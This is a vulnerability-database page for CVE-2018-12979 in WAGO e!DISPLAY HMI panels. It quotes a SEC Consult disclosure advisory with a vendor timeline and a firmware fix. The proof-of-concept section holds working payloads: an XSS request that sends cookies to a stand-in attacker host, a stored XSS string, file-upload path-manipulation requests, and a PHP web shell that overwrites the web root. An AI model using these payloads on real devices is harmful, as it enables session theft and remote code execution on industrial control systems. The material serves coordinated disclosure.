Vulnerabilities > CVE-2018-12979 - Incorrect Permission Assignment for Critical Resource vulnerability in Wago products

CVSS 5.5 - MEDIUM

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

SINGLE

Confidentiality impact

NONE

Integrity impact

PARTIAL

Availability impact

PARTIAL

network

low complexity

wago

CWE-732

exploit available

NVD

Published: 2018-07-12

Updated: 2021-05-20

Summary

An issue was discovered on WAGO e!DISPLAY 762-3000 through 762-3003 devices with firmware before FW 02. Weak permissions allow an authenticated user to overwrite critical files by abusing the unrestricted file upload in the WBM.

Vulnerable Configurations

Part	Description	Count
OS	Wago Wago 762 3000 Firmware - Wago 762 3001 Firmware - Wago 762 3002 Firmware - Wago 762 3003 Firmware -	4
Hardware	Wago Wago 762 3000 - Wago 762 3001 - Wago 762 3002 - Wago 762 3003 -	4

Common Weakness Enumeration (CWE)

CWE-732 - Incorrect Permission Assignment for Critical Resource

Common Attack Pattern Enumeration and Classification (CAPEC)

Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by the authorization framework, whose job it is to map ACLs to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application or can run queries for data that he is otherwise not supposed to.
Privilege Abuse
An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources. If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts. This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.
Directory Indexing
An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.
Accessing, Modifying or Executing Executable Files
An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
Exploiting Incorrectly Configured Access Control Security Levels
An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack. Most commonly, attackers would take advantage of controls that provided too little protection for sensitive activities in order to perform actions that should be denied to them. In some circumstances, an attacker may be able to take advantage of overly restrictive access control policies, initiating denial of services (if an application locks because it unexpectedly failed to be granted access) or causing other legitimate actions to fail due to security. The latter class of attacks, however, is usually less severe and easier to detect than attacks based on inadequate security restrictions. This attack pattern differs from CAPEC 1, "Accessing Functionality Not Properly Constrained by ACLs" in that the latter describes attacks where sensitive functionality lacks access controls, where, in this pattern, the access control is present, but incorrectly configured.

Exploit-Db

description	WAGO e!DISPLAY 7300T - Multiple Vulnerabilities. CVE-2018-12979,CVE-2018-12980,CVE-2018-12981. Webapps exploit for PHP platform. Tags: Cross-Site Scripting (...
file	exploits/php/webapps/45014.txt
id	EDB-ID:45014
last seen	2018-07-13
modified	2018-07-13
platform	php
port	80
published	2018-07-13
reporter	Exploit-DB
source	https://www.exploit-db.com/download/45014/
title	WAGO e!DISPLAY 7300T - Multiple Vulnerabilities
type	webapps

Packetstorm

data source	https://packetstormsecurity.com/files/download/148494/SA-20180711-0.txt
id	PACKETSTORM:148494
last seen	2018-07-12
published	2018-07-11
reporter	T. Weber
source	https://packetstormsecurity.com/files/148494/WAGO-e-DISPLAY-7300T-XSS-File-Upload-Code-Execution.html
title	WAGO e!DISPLAY 7300T XSS / File Upload / Code Execution

Seebug

bulletinFamily	exploit
description	### VENDOR DESCRIPTION “New ideas are the driving force behind our success WAGO is a family-owned company headquartered in Minden, Germany. Independently operating for three generations, WAGO is the global leader of spring pressure electrical interconnect and automation solutions. For more than 60 years, WAGO has developed and produced innovative products for packaging, transportation, process, industrial and building automation markets amongst others. Aside from its innovations in spring pressure connection technology, WAGO has introduced numerous innovations that have revolutionized industry. Further ground-breaking inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®.” Source: http://www.wago.us/wago/ “For visualization tasks with CODESYS 2 and CODESYS 3: WAGO’s new e!DISPLAY 7300T Web Panels help you reinforce the quality of your machinery and equipment with a refined design and industry-leading software. Learn more about how the right Web Panels make a difference. HMI components are the finishing touch for machines or systems and they have an overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing HMIs that leave a lasting impression and significantly increase both the value and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is available in 4.3”, 5.7”, 7.0” and 10.1” display sizes.” Source: http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp ### BUSINESS RECOMMENDATION HMI displays are widely used in SCADA infrastructures. The link between their administrative (or informational) web interfaces and the users which access these interfaces is critical. The presented attacks demonstrate how simple it is to inject malicious code in order to break the security of this link by exploiting minimal user interaction. As a consequence a computer which is used for HMI administration should not provide any possibility to get compromised via malicious script code. One possible solution may be e.g.: * Don’t allow email clients * Don’t provide Internet access at all on the HMI stations SEC Consult recommends to immediately apply the available patches from the vendor. A thorough security review should be performed by security professionals to identify further potential security issues. ### VULNERABILITY OVERVIEW/DESCRIPTION #### 1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981) Reflected cross site scripting vulnerabilities were identified within multiple PHP scripts in the admin interface. The parameter JSON input which is sent to the device is not sanitized sufficiently. An attacker can exploit this vulnerability to execute arbitrary scripts in the context of the attacked user and gain control over the active session. This vulnerability is present for authenticated and unauthenticated users! #### 2) Stored Cross-Site Scripting (CVE-2018-12981) A stored cross-site scripting vulnerability was identified within the “PLC List” which can be configured in the web interface of the e!Display. By storing a payload there, an administrative or guest user can be attacked without tricking them to visit a malicious web site or clicking on an malicious link. This vulnerability is only present for authenticated users! #### 3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980) Arbitrary files can be uploaded to the system without any check. It is even possible to change the location of the uploaded file on the system. As the web service does not run as privileged user, it is not possible to upload a file directly to the web root but on many other locations on the file system. The normal user ‘user’ and the administrative user ‘admin’ can both upload files to the system. #### 4) Incorrect Default Permissions (CVE-2018-12979) Due to incorrect default permissions a file in the web root can be overwritten by the unprivileged ‘www’ user. This is the same user which is used in the context of the web server. #### 5) Remote code execution via multiple attack vectors By stacking vulnerability 1)/2), 3) and 4) with this vulnerability an outside attacker can place a malicious script on the device in order to execute arbitrary commands as ‘www’. This can be done by uploading a web shell or a reverse shell. ### PROOF OF CONCEPT 1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981) The affected endpoints are: ``` http://<IP-Address>/wbm/configtools.php http://<IP-Address>/wbm/login.php http://<IP-Address>/wbm/receive_upload.php ``` The following request is an example for reflected XSS within ‘configtools.php’: ``` POST /wbm/configtools.php HTTP/1.1 Host: <IP-Address> Content-type: text/plain [...] {"sessionId":"","aDeviceParams":{"0":{"name":"firewall","parameter":["iptables","--get-xml"],"sudo":true,"multiline":true,"timeout":10000},"1":{"name":"firewall","parameter":["firewall","--is-enabled"],"sudo":true,"multiline":true,"timeout":10000,"dataId":"{DoNotParseAsXml}<img src=x onerror=this.src='http://$attacker:8001/?c='+document.cookie>;"}}} ``` Steal the cookie via XSS and send it to http://$attacker:8001?c=<Session-ID>: ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://<IP-Address>/wbm/configtools.php" method="POST" enctype="text/plain"> <input type="hidden" name="{"sessionId":"","aDeviceParams":{"0":{"name":"firewall","parameter":["iptables","--get-xml"],"sudo":true,"multiline":true,"timeout":10000},"1":{"name":"firewall","parameter":["firewall","--is-enabled"],"sudo":true,"multiline":true,"timeout":10000,"dataId":"{DoNotParseAsXml}<img src" value="x onerror=this.src='http://...:8001/?c='+document.cookie>;"}}}" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` 2) Stored Cross-Site Scripting (CVE-2018-12981) To exploit this vulnerability malicious code has to be placed in the “PLC List” by surfing to the endpoint http://<IP-Address>/app/index.html and clicking on the tab “Application->PLC-List”. By opening one of the configurable PLCs the name can be changed in the box “Text:” in order to execute arbitrary script-code. For example: ``` <img src=a onerror=alert('SEC_Consult_XSS');alert(document.cookie)> ``` The payload can also be placed on the device by using the following POST request: ``` POST /wbm/configtools.php HTTP/1.1 Host: <IP-Address> [...] {"sessionId":"<Valid session-ID> ","aDeviceParams":{"0":{"name":"config_plcselect","parameter":[2,"url=https://127.0.0.1:8001","txt=<img src=a onerror=alert('SEC_Consult_XSS');alert(document.cookie)>","vkb=enabled","mon=1"],"sudo":true}}} ``` 3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980) The file path, the file name and the file content can be manipulated in any way. There is no server-side check for malicious files. ``` POST /wbm/receive_upload.php HTTP/1.1 Host: <IP-Address> [...] Content-Type: multipart/form-data; boundary=---------------------------728140389204955163192597293 -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="touchWbm" true -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="upload_type" font -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="session_id" <Valid session-ID> -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="upload_directory" /tmp/ -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="font_file"; filename="any_file.sh" Content-Type: application/x-font-ttf any-content #! -----------------------------728140389204955163192597293-- ``` 4) Incorrect Default Permissions (CVE-2018-12979) The file ‘index.html’ is owned by ‘www’ and can therefore also be overwritten with a web shell. ``` www@WAGO_eDisplay:/var/www ls -la drwxr-xr-x 5 root root 488 XXX 99 2018 . drwxr-xr-x 11 root root 824 XXX 99 2018 .. lrwxrwxrwx 1 root root 16 XXX 99 2018 app -> /var/www/WagoWBM -rw-r--r-- 1 www www 345 XXX 99 2018 index.html drwxr-xr-x 7 root root 776 XXX 99 2018 plclist drwxr-xr-x 3 root root 368 XXX 99 2018 WagoWBM drwxr-xr-x 2 root root 688 XXX 99 2018 wbm ``` 5) Remote code execution via multiple attack vectors By uploading a simple PHP shell and overwriting the ‘index.html’ file located under the web root an attacker can place a web shell which is reachable without any authentication. ``` POST /wbm/receive_upload.php HTTP/1.1 Host: <IP-Address> [...] Content-Type: multipart/form-data; boundary=---------------------------728140389204955163192597293 -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="touchWbm" true -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="upload_type" font -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="session_id" <Valid session-ID> -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="upload_directory" /var/www/ -----------------------------728140389204955163192597293 Content-Disposition: form-data; name="font_file"; filename="index.html" Content-Type: application/x-font-ttf <html><body> <form method="GET" name="SEC Consult PoC" action=""> <input type="text" name="command"><input type="submit" value="Send"></form> <pre><?php if($_GET['command']){system($_GET['command']);} ?></pre> </body></html> -----------------------------728140389204955163192597293-- ``` The shell can now be reached via “http://<IP-Address>/index.html”. It is also possible to upload a reverse-shell to the system which connects to a computer outside of the actual network. ### VULNERABLE / TESTED VERSIONS The following device with the firmware version has been tested: * e!DISPLAY 7300T – WP 4.3 480×272 PIO1 – 01.01.10(01) According to WAGO the following e!DISPLAY versions are vulnerable: * 762-3000 FW 01 * 762-3001 FW 01 * 762-3002 FW 01 * 762-3003 FW 01 ### VENDOR CONTACT TIMELINE * 2018-04-30: Sending encrypted advisory to VDE CERT for coordination support ([email protected]) * 2018-05-02: Answer from VDE CERT that WAGO will be informed/contacted * 2018-05-08: Status update from VDE CERT * 2018-05-23: Asking for status update, no news from WAGO (via VDE CERT) * 2018-06-08: VDE CERT: WAGO fixed the vulnerabilities and firmware is in testing phase * 2018-06-12: WAGO requested more time, postponing release date, asking for affected & fixed versions * 2018-06-13: VDE CERT will request CVE numbers * 2018-06-17: WAGO scheduled the release for 2018-07-11 * 2018-06-26: VDE CERT sends WAGO advisory draft including affected/fixed versions * 2018-07-04: VDE CERT sends final WAGO advisory incl. CVE numbers * 2018-07-10: VDE CERT publishes security notice: https://cert.vde.com/de-de/advisories/vde-2018-010 * 2018-07-11: SEC Consult advisory release ### SOLUTION Update the device to the latest available firmware (FW 02). For further information see the vendor’s security notifications page: https://www.wago.com/de/automatisierungstechnik/security (German) Direct link to English WAGO advisory. ### WORKAROUND Restrict network access to the device, don’t allow Internet access from the HMI station and do not install software from untrusted sources.
id	SSV:97417
last seen	2018-07-13
modified	2018-07-12
published	2018-07-12
reporter	My Seebug
title	Remote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T